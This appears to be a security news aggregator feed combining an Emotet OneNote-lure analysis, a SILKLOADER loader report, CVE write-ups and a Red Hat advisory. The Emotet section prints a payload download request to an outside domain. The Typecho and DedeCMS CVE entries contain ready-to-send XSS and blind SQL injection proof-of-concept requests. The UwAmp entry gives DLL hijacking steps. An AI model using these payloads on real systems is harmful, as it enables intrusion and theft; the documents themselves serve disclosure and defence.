Categories: Threat Intelligence
Emotet finally got the memo and added Microsoft OneNote lures.



(Read more...)




The post Emotet adopts Microsoft OneNote attachments appeared first on Malwarebytes Labs.

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet's turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%\\OneNote\\16.0\\NT\\0\\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn\[.\]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: \*/\*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%\\OneNote\\16.0\\NT\\0\\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Emotet adopts Microsoft OneNote attachments

Threat activity clusters affiliated with the Chinese and Russian cybercriminal ecosystems have been observed using a new piece of malware that's designed to load Cobalt Strike onto infected machines.
Dubbed SILKLOADER by Finnish cybersecurity company WithSecure, the malware leverages DLL side-loading techniques to deliver commercial adversary simulation software.
The development comes as

Threat activity clusters affiliated with the Chinese and Russian cybercriminal ecosystems have been observed using a new piece of malware that's designed to load Cobalt Strike onto infected machines.

Dubbed **SILKLOADER** by Finnish cybersecurity company WithSecure, the malware leverages DLL side-loading techniques to deliver commercial adversary simulation software.

The development comes as improved detection capabilities against Cobalt Strike, a legitimate post-exploitation tool used for red team operations, is forcing threat actors to seek alternative options or concoct new ways to propagate the framework to evade detection.

"The most common of these include adding complexity to the auto-generated beacon or stager payloads via the utilization of packers, crypters, loaders, or similar techniques," WithSecure researchers said.

SILKLOADER joins other loaders such as KoboldLoader, MagnetLoader, and LithiumLoader that have been recently discovered incorporating Cobalt Strike components.

It also shares overlaps with LithiumLoader in that both employ the DLL side-loading method to hijack a legitimate application with the goal of running a separate, malicious dynamic link library (DLL).

SILKLOADER achieves this via specially crafted libvlc.dll files that are dropped alongside a legitimate but renamed VLC media player binary (Charmap.exe).

WithSecure said it identified the shellcode loader following an analysis of "several human-operated intrusions" targeting various entities spanning a wide range of organizations located in Brazil, France, and Taiwan in Q4 2022.

Although these attacks were unsuccessful, the activity is suspected to be a lead-up to ransomware deployments, with the tactics and tooling "heavily overlapping" with those attributed to the operators of the Play ransomware.

In one attack aimed at an unnamed French social welfare organization, the threat actor gained a foothold into the network by exploiting a compromised Fortinet SSL VPN appliance to stage Cobalt Strike beacons.

"The threat actor maintained a foothold in this organization for several months," WithSecure said. "During this time, they performed discovery and credential stealing activities, followed by deployment of multiple Cobalt Strike beacons."

But when this attempt failed, the adversary switched to using SILKLOADER to bypass detection and deliver the beacon payload.

That's not all. Another loader known as BAILLOADER, which is also used to distribute Cobalt Strike beacons, has been linked to attacks involving Quantum ransomware, GootLoader, and the IcedID trojan in recent months.

BAILLOADER, for its part, is said to exhibit similarities with a crypter codenamed Tron that has been put to use by different adversaries to distribute Emotet, TrickBot, BazarLoader, IcedID, Conti ransomware, and Cobalt Strike.

This has given rise to the possibility that disparate threat actors share Cobalt Strike beacons, crypters, and infrastructure provided by third-party affiliates to service multiple intrusions utilizing different tactics.

In other words, SILKLOADER is likely being offered as an off-the-shelf loader through a Packer-as-a-Service program to Russian-based threat actors.

"This loader is being provided either directly to ransomware groups or possibly via groups offering Cobalt Strike/Infrastructure-as-a-Service to trusted affiliates," WithSecure said.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

"Most of these affiliates appear to have been part of or have had close working relationships with the Conti group, its members, and offspring after its alleged shutdown."

SILKLOADER samples analyzed by the company show that early versions of the malware date back to the start of 2022, with the loader exclusively put to use in different attacks targeting victims in China and Hong Kong.

The shift from East Asian targets to other countries such as Brazil and France is believed to have occurred around July 2022, after which all SILKLOADER-related incidents have been attributed to Russian cybercriminal actors.

This has further given way to a hypothesis that "SILKLOADER was originally written by threat actors acting within the Chinese cybercriminal ecosystem" and that the "loader was used by the threat actors within this nexus at least as early as May 2022 till July 2022."

"The builder or source code was later acquired by a threat actor within the Russian cybercriminal ecosystem between July 2022 and September 2022," WithSecure said, adding, "the original Chinese author sold the loader to a Russian threat actor once they no longer had any use for it."

Both SILKLOADER and BAILLOADER are just the latest examples of threat actors refining and retooling their approaches to stay ahead of the detection curve.

"As the cybercriminal ecosystem becomes more and more modularized via service offerings, it is no longer possible to attribute attacks to threat groups simply by

linking them to specific components within their attacks," WithSecure researchers concluded.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese and Russian Hackers Using SILKLOADER Malware to Evade Detection

An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the macinstring function.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-27786: Fix bugs caused by strtok_r by Marsman1996 · Pull Request #783 · appneta/tcpreplay

Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via the Comment Manager /admin/manage-comments.php component.

**Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability****Influenced Version**

Typecho <= 1.2.0

**Description**

Typecho admin backend comment manager with refleted-XSS vulnerability..

1.  Login to admin backend management system.
2.  In Comment Manager /admin/manage-comments.php, the unfiltered request parameter cid is directly echoed to html.

**POC**

POST /admin/manage-comments.php with:

    coid[]=1&cid="><script>alert(1)</script><!--
    

The full POC request:

POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&\_\_typecho\_all\_posts=off&uid= HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 745020ecd4b17dde48d43755702a78b4\_\_typecho\_uid=1; 745020ecd4b17dde48d43755702a78b4\_\_typecho\_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD\_2132\_saltkey=ql9191Ym; u5DD\_2132\_lastvisit=1677486351; u5DD\_2132\_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD\_2132\_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD\_2132\_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD\_2132\_lastcheckfeed=1%7C1677489964; u5DD\_2132\_nofavfid=1; u5DD\_2132\_home\_diymode=1; u5DD\_2132\_visitedfid=2; u5DD\_2132\_smile=1D1; u5DD\_2132\_home\_readfeed=1677497943; u5DD\_2132\_forum\_lastvisit=D\_2\_1677498054; u5DD\_2132\_st\_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD\_2132\_editormode\_e=1; u5DD\_2132\_st\_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD\_2132\_viewid=tid\_1; u5DD\_2132\_seccode=5.792e3c6d8b004d4403; u5DD\_2132\_seccodecSE52ETX=6.a73b7daa353701b59a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

coid\[\]=1&cid="><script>alert(1)</script><!--

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27711: Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability · Issue #1539 · typecho/typecho

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dedestory_catalog.php endpoint.

**Description**

Admin backend story catalog blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/story_catalog.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  Requires PHP ≤ 5 and MySQL ≤ 5.5, and the story component contains at least one record in database.
4.  In the source code of /dede/story_catalog.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

POST /cms/dedecms/dede/story\_catalog.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fstory\_books.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27709: DedeCMS V5.7.160 Backend Blind SQL Injection

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dede/group_store.php endpoint.

**Description**

Admin backend group store blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/group_store.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  In the source code of /dede/group_store.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  

POST /cms/dedecms/dede/group\_store.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup\_store.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27707: DedeCMS V5.7.160 Backend Blind SQL Injection

Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via an arbitrarily supplied URL parameter.

**Typecho <= 1.2.0 Admin System with Reflected-XSS****Influenced Version**

Typecho <= 1.2.0

**Description**

Typecho admin backend management system with reflected-XSS in the name of an arbitrarily supplied URL parameter.

1.  Login to typecho admin backend management system, in "/admin/index.php", "admin/themes.php" or "/admin/backup.php".
2.  In the name of an arbitrarily supplied URL parameter, no matter key or value, will be injected to a html href attribute of <a> tag.

**POC**

    GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1
    Host: 192.168.0.10
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296
    Connection: close
    
    

/admin/index.php

/admin/theme.php

/admin/backup.php

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27130: Typecho <= 1.2.0 Admin System with Reflected-XSS Vulnerability · Issue #1535 · typecho/typecho

An issue found in UwAmp v.1.1, 1.2, 1.3, 2.0, 2.1, 2.2, 2.2.1, 3.0.0, 3.0.1, 3.0.2 allows a remote attacker to execute arbitrary code via a crafted DLL.

Platform: Windows 10 version 1904

Impact: Arbitrary Code Execution and Privilege Escalation

Product: UwAmp.exe

Version: 3.0.2

Summary:

A malicous user can perform arbitrary code execution and priviledge escalation on victim machine by hijacking DLLs.

DLL Hijacking vulnerability occurs when some DLLs are missing from same directory of vulnerable binary.

Crafted Malicous DLLs are used to replace missing dlls and perform malicious actions

Missing DLL : shfolder.dll

Steps to reproduce:

1\. Use ProcMon to listen on events

2\. ProcMon shows shfolder.dll is missing from current directory

2\. Place malicious DLL naming shfolder.dll to current directory of installer

3\. Now run UwAmp.exe and installer will try to load malicous dll which leads to arbitrary code execution and privilege escalation.

Impact:

1\. Privilege Escalation

2\. Arbitrary Code Execution

Mitigation:

1\. Avoid loading DLLs from current location

CVE-2021-31637: UwAmp Arbitrary Code Execution

Red Hat Security Advisory 2023-1278-01 - An update for openstack-nova is now available for Red Hat OpenStack Platform. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (openstack-nova) security update  
Advisory ID:       RHSA-2023:1278-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1278  
Issue date:        2023-03-15  
CVE Names:         CVE-2022-47951   
=====================================================================

1. Summary:

An update for openstack-nova is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 13.0 - ELS - noarch  
Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server - noarch  
Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch

3. Description:

OpenStack Compute (codename Nova) is open source software designed  
to provision and manage large networks of virtual machines, creating a  
redundant and scalable cloud computing platform. It gives you the software,  
control panels, and APIs required to orchestrate a cloud, including running  
instances, managing networks, and controlling access through users and  
projects.OpenStack Compute strives to be both hardware and hypervisor  
agnostic, currently supporting a variety of standard hardware  
configurations and seven major hypervisors.

Security Fix(es):

* Arbitrary file access through custom VMDK flat descriptor  
(CVE-2022-47951)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161812 - CVE-2022-47951 openstack: Arbitrary file access through custom VMDK flat descriptor

6. Package List:

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
python-oslo-utils-3.35.1-5.el7ost.src.rpm

noarch:  
python-oslo-utils-lang-3.35.1-5.el7ost.noarch.rpm  
python2-oslo-utils-3.35.1-5.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server:

Source:  
openstack-nova-17.0.13-40.el7ost.src.rpm  
python-oslo-utils-3.35.1-5.el7ost.src.rpm

noarch:  
openstack-nova-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-api-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-cells-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-common-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-compute-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-conductor-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-console-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-migration-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-network-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-novncproxy-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-placement-api-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-scheduler-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-serialproxy-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-spicehtml5proxy-17.0.13-40.el7ost.noarch.rpm  
python-nova-17.0.13-40.el7ost.noarch.rpm  
python-nova-tests-17.0.13-40.el7ost.noarch.rpm  
python-oslo-utils-lang-3.35.1-5.el7ost.noarch.rpm  
python2-oslo-utils-3.35.1-5.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
openstack-nova-17.0.13-40.el7ost.src.rpm  
python-oslo-utils-3.35.1-5.el7ost.src.rpm

noarch:  
openstack-nova-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-api-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-cells-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-common-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-compute-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-conductor-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-console-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-migration-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-network-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-novncproxy-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-placement-api-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-scheduler-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-serialproxy-17.0.13-40.el7ost.noarch.rpm  
openstack-nova-spicehtml5proxy-17.0.13-40.el7ost.noarch.rpm  
python-nova-17.0.13-40.el7ost.noarch.rpm  
python-nova-tests-17.0.13-40.el7ost.noarch.rpm  
python-oslo-utils-lang-3.35.1-5.el7ost.noarch.rpm  
python2-oslo-utils-3.35.1-5.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
python-oslo-utils-3.35.1-5.el7ost.src.rpm

noarch:  
python-oslo-utils-lang-3.35.1-5.el7ost.noarch.rpm  
python2-oslo-utils-3.35.1-5.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
python-oslo-utils-3.35.1-5.el7ost.src.rpm

noarch:  
python-oslo-utils-lang-3.35.1-5.el7ost.noarch.rpm  
python2-oslo-utils-3.35.1-5.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
python-oslo-utils-3.35.1-5.el7ost.src.rpm

noarch:  
python-oslo-utils-lang-3.35.1-5.el7ost.noarch.rpm  
python2-oslo-utils-3.35.1-5.el7ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
openstack-nova-20.4.1-1.20221005193231.1ee93b9.el8ost.src.rpm  
python-oslo-utils-3.41.6-1.20230130153634.f4deaad.el8ost.src.rpm

noarch:  
openstack-nova-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-api-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-common-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-compute-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-conductor-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-console-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-migration-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-novncproxy-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-scheduler-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-serialproxy-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
openstack-nova-spicehtml5proxy-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
python-oslo-utils-lang-3.41.6-1.20230130153634.f4deaad.el8ost.noarch.rpm  
python3-nova-20.4.1-1.20221005193231.1ee93b9.el8ost.noarch.rpm  
python3-oslo-utils-3.41.6-1.20230130153634.f4deaad.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-nova-20.6.2-2.20221005185231.6786e96.el8ost.src.rpm  
python-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.src.rpm

noarch:  
openstack-nova-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-api-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-common-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-compute-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-conductor-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-console-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-migration-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-novncproxy-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-scheduler-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-serialproxy-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
openstack-nova-spicehtml5proxy-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
python-oslo-utils-lang-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm  
python3-nova-20.6.2-2.20221005185231.6786e96.el8ost.noarch.rpm  
python3-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
python-oslo-utils-3.41.6-1.20230130153634.f4deaad.el8ost.src.rpm

noarch:  
python-oslo-utils-lang-3.41.6-1.20230130153634.f4deaad.el8ost.noarch.rpm  
python3-oslo-utils-3.41.6-1.20230130153634.f4deaad.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
python-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.src.rpm

noarch:  
python-oslo-utils-lang-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm  
python3-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
python-oslo-utils-3.41.6-1.20230130153634.f4deaad.el8ost.src.rpm

noarch:  
python-oslo-utils-lang-3.41.6-1.20230130153634.f4deaad.el8ost.noarch.rpm  
python3-oslo-utils-3.41.6-1.20230130153634.f4deaad.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
python-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.src.rpm

noarch:  
python-oslo-utils-lang-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm  
python3-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
python-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.src.rpm

noarch:  
python-oslo-utils-lang-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm  
python3-oslo-utils-3.41.6-2.20230130154947.f4deaad.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47951  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBI1RtzjgjWX9erEAQiFTA/8DCpGWRVtF82+lBizwoswP091Zt+VGmCF  
KN7LNLDB6ruGPbz7pptYPCzsGIpcYOTJ8Yq9kGdsO+uxiOpew/ipA/OEFKW1KD9Q  
3RutwrGEyFDf4s9UFLfA1Hk8iq8P+r8mrgLhYSVY3mLJDT1URz9AKIwcP+YicpAT  
eOfjoVsriG8PBofQLPRhn/tEaoxhdL4Ygsrtrw2SdKJPys90A5x9dB4mTw7vvCcS  
wWjNKYZWskBPwd0yOHTOErVjDz2fU9aDtqn4sKGrbu3vB7VUZFNkrsMmFgBS6Tkd  
+uHJ/jWrhyT6HKPIGDSw0pC//vLjbETsPi2711DKsYKTdrzElUjqDJ0VepReY548  
SZqtVT8tKlfdFiYDs1K0fQnpSJUph+T0Afam8zH3+KDNYWH8+cQnQZEqI+6rfnVX  
GIm1423Q+eU2AL5s5uVCIi24wcGzuJU2UC8zxkhkrOB1/kXr2tw4It2lT77u0Gi8  
DvdNh2nAyxl51VfhgFWaRS6O3eaAF2GqVSjtOzwHx+3sl01dpxtfonlkFLw9GNBJ  
aDx0y+ifMgA4y6KpPnyRzFJYD3lVJRmGbe/lPey21X+bt5jOXcNuwjTptlviiUbv  
Q3GmPcQvqdieNx2KTbcHzexWQwz99Zhd0P4Y1iXszJ43nx8lxBM8HJes90t6oF3D  
8mDXqkOVhBY=  
=Qo2j  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1278-01

Minerva's robust technology and talented engineering team extend Rapid7's end-to-end managed threat detection and orchestration capabilities from the endpoint to the cloud.

**BOSTON, March 15, 2023 (GLOBE NEWSWIRE) --** Rapid7, Inc. (NASDAQ: RPD), a leader in cloud risk and threat detection, today announced it has acquired Minerva Labs, Ltd., a leading provider of anti-evasion and ransomware prevention technology. Today, Rapid7’s ManagedDetection and Response  (MDR) services provide customers elevated detection and response capabilities across their cloud, on-premise and extended attack surfaces. With this acquisition, Rapid7 will further extend its leading managed threat detection capabilities with the ability to orchestrate advanced ransomware prevention. These new capabilities will seamlessly extend MDR across cloud resources, traditional infrastructure, and existing endpoint protection infrastructure, enabling customers to further consolidate their security investments.  

With a growing attack landscape and the increasing pervasiveness of ransomware, organizations need to take a holistic and pragmatic approach to detection and response. In order to achieve best-in-class threat detection, security programs will benefit from leveraging seamless access to telemetry across their attack surface and technology consolidation that drives more effective threat response.

